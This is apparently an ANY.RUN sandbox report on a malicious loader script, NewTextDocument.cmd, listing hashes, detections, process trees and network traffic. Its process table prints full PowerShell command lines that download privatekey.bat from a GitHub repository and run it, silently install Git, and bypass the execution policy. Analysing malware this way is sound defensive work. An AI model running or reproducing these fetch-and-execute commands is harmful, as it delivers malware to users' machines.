File name:

NewTextDocument.cmd

Full analysis: https://app.any.run/tasks/70a944a4-3cd0-496e-9e55-4b33b4b64479
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: January 16, 2025, 15:46:03
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
github
reflection
loader
Indicators:
MIME: text/plain
File info: ASCII text, with no line terminators
MD5:

58C7C592BBD0A1FEAF1B2318BA603C98

SHA1:

48147E4BB824EF486B228F2872384FA0C52DCA41

SHA256:

25DE0BFBB387615D0D5FCF94073D435A532D466D60FF1DF01104B1A474321F9E

SSDEEP:

6:s8qOLh8JUWfdMGfIxthZhhkXu1MFIsV8EFI2VgSS:s8JGOYdMGfIxthZPn1MnV8EFzVM

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 5400)

  • SUSPICIOUS

    • Downloads file from URI via Powershell

      • powershell.exe (PID: 1616)
      • powershell.exe (PID: 3552)

    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 5400)
      • cmd.exe (PID: 4716)

    • Application launched itself

      • powershell.exe (PID: 5400)

    • Starts process via Powershell

      • powershell.exe (PID: 1616)
      • powershell.exe (PID: 3552)

    • Executing commands from a ".bat" file

      • powershell.exe (PID: 1616)

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 1616)

    • Removes files via Powershell

      • powershell.exe (PID: 3552)

    • Detects reflection assembly loader (YARA)

      • powershell.exe (PID: 1616)
      • powershell.exe (PID: 5400)

  • INFO

    • Checks proxy server information

      • powershell.exe (PID: 1616)
      • powershell.exe (PID: 3552)

    • The process uses the downloaded file

      • powershell.exe (PID: 1616)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
118
Monitored processes
6
Malicious processes
2
Suspicious processes
2

Behavior graph

Click at the process to see the details
start powershell.exe no specs conhost.exe no specs powershell.exe cmd.exe no specs conhost.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
1616"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Invoke-WebRequest -Uri https://raw.githubusercontent.com/CelestialNFT/Airdrop-Whitelist/main/privatekey.bat -OutFile privatekey.bat; Start-Process -FilePath cmd.exe -ArgumentList '/c', 'privatekey.bat & pause' -Wait"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
3436\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3552powershell -Command "Invoke-WebRequest -Uri https://github.com/git-for-windows/git/releases/download/v2.47.1.windows.1/Git-2.47.1-64-bit.exe -OutFile GitInstallerss.exe; Start-Process -FilePath .\GitInstallerss.exe -ArgumentList '/VERYSILENT', '/NORESTART' -Wait; Remove-Item -Force GitInstallerss.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
4716"C:\WINDOWS\system32\cmd.exe" /c privatekey.bat & pause C:\Windows\System32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
5400"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass C:\Users\admin\Desktop\NewTextDocument.cmd.ps1C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6076\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
14 012
Read events
14 012
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
3
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
5400powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:5CC2B97B32344F2DCC9D24EB99C7CF01
SHA256:677A602617076F3E97D218C19AB8611EC6919C089C4A73F1B035B034D47733CC
5400powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF136303.TMPbinary
MD5:D040F64E9E7A2BB91ABCA5613424598E
SHA256:D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670
5400powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_sieq0dxg.1ay.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5400powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ycx10ydz.1sh.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5400powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\80RHBJ96DHJLYBDXATL8.tempbinary
MD5:5CC2B97B32344F2DCC9D24EB99C7CF01
SHA256:677A602617076F3E97D218C19AB8611EC6919C089C4A73F1B035B034D47733CC
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
13
DNS requests
8
Threats
1

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5208
svchost.exe
GET
200
2.16.241.12:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5208
svchost.exe
GET
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
302
140.82.121.4:443
https://github.com/git-for-windows/git/releases/download/v2.47.1.windows.1/Git-2.47.1-64-bit.exe
unknown
GET
200
140.82.121.4:443
https://raw.githubusercontent.com/CelestialNFT/Airdrop-Whitelist/main/privatekey.bat
unknown
text
2.22 Kb
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
51.104.136.2:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
5208
svchost.exe
51.104.136.2:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5208
svchost.exe
2.16.241.12:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5208
svchost.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
1616
powershell.exe
185.199.111.133:443
raw.githubusercontent.com
FASTLY
US
shared
5208
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
3552
powershell.exe
140.82.121.3:443
github.com
GITHUB
US
whitelisted
3552
powershell.exe
185.199.111.133:443
raw.githubusercontent.com
FASTLY
US
shared
4
System
192.168.100.255:137
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.185.238
whitelisted
crl.microsoft.com
  • 2.16.241.12
  • 2.16.241.19
whitelisted
www.microsoft.com
  • 95.101.149.131
whitelisted
raw.githubusercontent.com
  • 185.199.111.133
  • 185.199.110.133
  • 185.199.109.133
  • 185.199.108.133
shared
settings-win.data.microsoft.com
  • 20.73.194.208
whitelisted
github.com
  • 140.82.121.3
whitelisted
objects.githubusercontent.com
  • 185.199.111.133
  • 185.199.108.133
  • 185.199.109.133
  • 185.199.110.133
shared
self.events.data.microsoft.com
  • 13.69.239.77
whitelisted

Threats

PID
Process
Class
Message
2192
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] Attempting to access raw user content on GitHub
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
NewTextDocument.cmd